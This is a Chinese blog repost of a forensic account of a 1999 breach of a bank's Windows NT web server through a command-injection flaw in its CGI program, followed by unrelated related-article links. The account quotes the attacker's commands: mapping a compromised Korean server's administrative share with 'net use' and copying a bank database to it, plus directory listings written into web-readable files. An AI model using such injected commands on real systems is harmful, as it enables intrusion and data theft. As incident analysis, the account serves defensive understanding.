一个黑客案列 (转)

最新推荐文章于 2024-09-28 19:25:16 发布
最新推荐文章于 2024-09-28 19:25:16 发布
阅读量132 收藏
点赞数
文章标签: shell 数据库
一个黑客案列 (转)[@more@]

 

东亚某银行
时间:1999年12月 该网站为windowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug非法调用。在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。通过EMail授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码;登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送!
 至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令.NET use * xxx.xxx.xxx.xxxc$ passwd /user:"administrator"),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。 但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:>x.txt 和dir c:data>x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。 为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:winntsystem32logfiles下面。(入侵者删除了c:winntsystem32logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示,在 http://BankServer/login/redir.exe 被多次调用。在调用参数的末尾,Ymouse发现了很多shell指令,其中就包括了 copy c:datadb1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。
 最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:winntsystem32logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,只是domain Users和Guests两个组,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。

 


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10790690/viewspace-951116/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10790690/viewspace-951116/

circularr9834
关注
操作系统与网络实现 之一(戊)
ya20151015的博客
11-03 292
在C盘根目录建立文件夹DJGPP,C:\DJGPP,将下载的文件全部拷贝到这个文件夹.进入dos窗口,打开文件夹C:\DJGPP,并运行命令: unzip32  *.zip. 用IE打开README.1ST,按其方法配置djgpp。 步骤如下: 设置环境变量 右击“我的电脑”——“属性”——“高级”——“环境变量”
windows XP 系统文件诠释A [2
weixin_33973609的博客
08-02 278
msvbvm50.dll ...Visual Basic 虚拟机 (文件版本: 5.2.82.44) 这是个老版本的 VB 虚拟机. msvbvm60.dll (也是 VB 虚拟机)文件版本: 6.0.96.90 ---------------------------------------------- msvcirt.dll ....Windows NT IO...
一个黑客案列
秦梦瑶的专栏
10-27 318
2000年11月28日 15:12:00 东亚某银行 时间:1999年12月 该网站WindowsNT 4.0,是这个国家最大的银行之一。该网站BankServer实际上两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443、65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外
使用nosql实现页面静态化的一个案列
weixin_30628077的博客
12-12 81
页面静态化,其实就是将动态生成的php页面,变成静态的HTML页面,让用户直接访问。有一下几方面好处: 1,首先就是访问速度,不需要去访问数据库,或者缓存来获取哪些数据,浏览器直接加载渲染html页即可。所以可以大大的提高访问效率; 2,从网站优化来分析,搜索引擎更喜欢静态的网页,静态网页与动态网页相比,搜索引擎更喜欢静的,更便于抓取,搜索引擎SEO排名更容易提高。 ...
黑客渗透攻击案例
摔不死的笨鸟的博客
07-14 1002
web渗透
盘点!被僵尸网络攻击的重大案列,揭秘黑客攻击网站全过程!
C语言C++学习俱乐部:765860056
12-23 848
僵尸网络可以控制Web服务器并关闭你喜欢的网站,甚至关闭整个互联网,破坏你的一天。 僵尸网络的功能正在增强。充分组织和全球化的僵尸网络将破坏互联网的各个部分,而不仅仅是单个站点,这就是它们所具有的力量。尽管具有强大的功能,但最大的DDoS攻击并未使用传统的僵尸网络结构。 僵尸网络如何成长? SearchSecurity僵尸网络定义指出:“僵尸网络是与互联网连接的设备的集合,其中可能包括受常见类型的恶意软件感染和控制的PC,服务器,移动设备和物联网设备。用户通常不知道僵尸网络感染了他们的系统。.
redis高级案列case
zhiqiang_zhao
11-16 241
利用bitmap实现,一个bitmap=2^32bit最大能存512M,一个用户一天签到用1个bit,一年365个bit就可以实现,1千万个用户一年只需要435MB还不到一个bitmap最大存储能力。UV: Unique Visitor ,独立访客数,是指在一个统计周期内,访问网站的人数之和。一般理解客户ip,需要去重。注意:canal依赖stater在中央仓库是不存在的,需要手动放进本地仓库或者你公司里面的nexus。PV : Page View,浏览量,是指在一个统计周期内,浏览页面的数之和。
华为防火墙概念及配置案列
zhanglongquan的博客
08-09 877
防火墙主要用于保护一个网络区域免受来自另一个网络区域的攻击和入侵行为、也是防止黑客攻击内部网络的重要防线之一。
银行测试端口和端口测试案列
03-09
- 测试案例:模拟黑客攻击,尝试入侵银行系统,验证系统的安全性和防护能力。 5. 性能测试端口(例如:端口号8080): - 测试案例:模拟多用户同时访问银行系统,验证系统的性能和负载能力。
老人智能手表方案/案列/APP/小程序/网站
6108我爱物联网方案开发CSDN博客
07-12 4359
家有一老,如有一宝,每个家庭中都有老人,中国老龄化越来越严重的今天,60周岁以上的人口越来越多,据统计,2018年老人人口统计数据中,按照年龄划分,年龄达到60周岁以上的人口数量接近2、2亿,到2035年预计赶超美国。老人的人口占比也有15%左右,像这类人群也延伸了很多关于老人的产业,最近,智能手表行业企业和第三方养老机构联合创建智慧养老模式,用养老模式到全国试点,生产出的一款老人智能手表,老人很...
聊一聊DNS劫持那些事、dns劫持案例、DNS解析原理、dns劫持工具
goyhj的博客
01-13 1279
今天我们来好好聊聊DNS劫持。先回顾一下DNS劫持的概念?DNS劫持即通过某种技术手段,篡改正确域名和IP地址的映射关系,使得域名映射到了错误的IP地址,因此可以认为DNS劫持是一种DNS重定向攻击。DNS劫持通常可被用作域名欺诈,如在用户访问网页时显示额外的信息来赚取收入等;也可被用作网络钓鱼,如显示用户访问的虚假网站版本并非法窃取用户的个人信息。 那DNS劫持到底有多大的危害呢?我们来看两个真实的大事件: DNS劫持大事记 事件1、《AWS route53 BGP路由泄漏事件》 事件危害:据不完全统计,
Python 爬虫案例
热门推荐
悦分享
10-19 1万+
大数据采集:通过爬虫获取特定行业(如汽车行业)股票的基本信息,并获取单只股票的历史行情数据。大数据存储:根据自定义的时间间隔定时获取涨幅前60名股票的实时行情数据,并存储在数据库中。大数据分析:计算股票的月涨跌幅,对股票进行相关性分析,并预测股票行情的未来走势。
Retrofit/Okhttp API接口加固技术实践(上)
Tamic (大白)
03-13 4576
作者:Tamic 地址:http://www.jianshu.com/u/3bbb1ddf4fd5 写这篇文章,我纠结了很久,到底是属于app安全系列,还是属于Retrofit系列,最终我还是选择了将本篇文章归类到Retrofit下。 对于retrofit安全相关的刚开始就写了一篇《Retrofit 2.0 超能实践(一),okHttp完美支持Https传输》(http://blog.csdn
Centos怎么执行脚本
qq_41941900的博客
09-27 288
方法一:切换到shell脚本所在的目录(此时,称为工作目录)执行shell脚本。方法三:直接使用bash 或sh 来执行bash shell脚本。方法四:在当前的shell环境中执行bash shell脚本。怎么执行脚本的详细内容,更多请关注CSDN其它相关文章!方法二:以绝对路径的方式去执行bash shell脚本。/" target="_blank">centos教程。
ubuntu安装nvm简易版
CherishTaoTao的博客
09-24 364
【代码】ubuntu安装nvm简易版。
进程的那些事--实现shell
2301_80148295的博客
09-28 438
目标:实现一个shell 实现思想: 1:捕捉用户的输入 2:对用户输入进行解析 3:创建子进程 3.1:对子进程进行替换,替换为对应的指令 3.2:替换失败子进程退出 4:父进程等待子进程退出--避免僵尸进程
【Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 760
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
一个模拟黑客的pygame
最新发布
09-29
创建一个模拟黑客的Python游戏,可以使用Pygame库来设计界面和基本的游戏机制。Pygame是一个流行的跨平台游戏开发框架,适合制作2D游戏。以下是一个简单的步骤概述: 1. **安装Pygame**:首先需要安装Pygame库,如果尚未安装,可以使用pip命令: ``` pip install pygame ``` 2. **项目初始化**:导入必要的模块并设置窗口大小、颜色等基本配置。 ```python import pygame pygame.init() screen = pygame.display.set_mode((800, 600)) pygame.display.set_caption("模拟黑客") ``` 3. **角色设计**:创建黑客和目标系统类,包括位置、状态(是否破解成功等)、动画或图像。 ```python class Hacker(pygame.sprite.Sprite): def __init__(...): super().__init__() class System(pygame.sprite.Sprite): def __init__(...): super().__init__() ``` 4. **游戏循环**:主游戏循环,处理用户输入、更新游戏状态、绘制角色和检测碰撞。 ```python running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False hacker.move() # 简单地移动黑客 system.update() # 更新系统状态 screen.fill((0, 0, 0)) # 渲染黑色背景 hacker.draw(screen) system.draw(screen) pygame.display.flip() ``` 5. **攻击和防御机制**:添加攻击函数,黑客尝试破解系统,同时系统有防御措施,如反病毒扫描或防火墙。 6. **结束条件和得分**:当黑客成功或失败时,显示结果并计算分数,然后退出或开始新局。 7. **优化和美化**:添加音效、动画、更复杂的交互以及UI元素,提升游戏体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值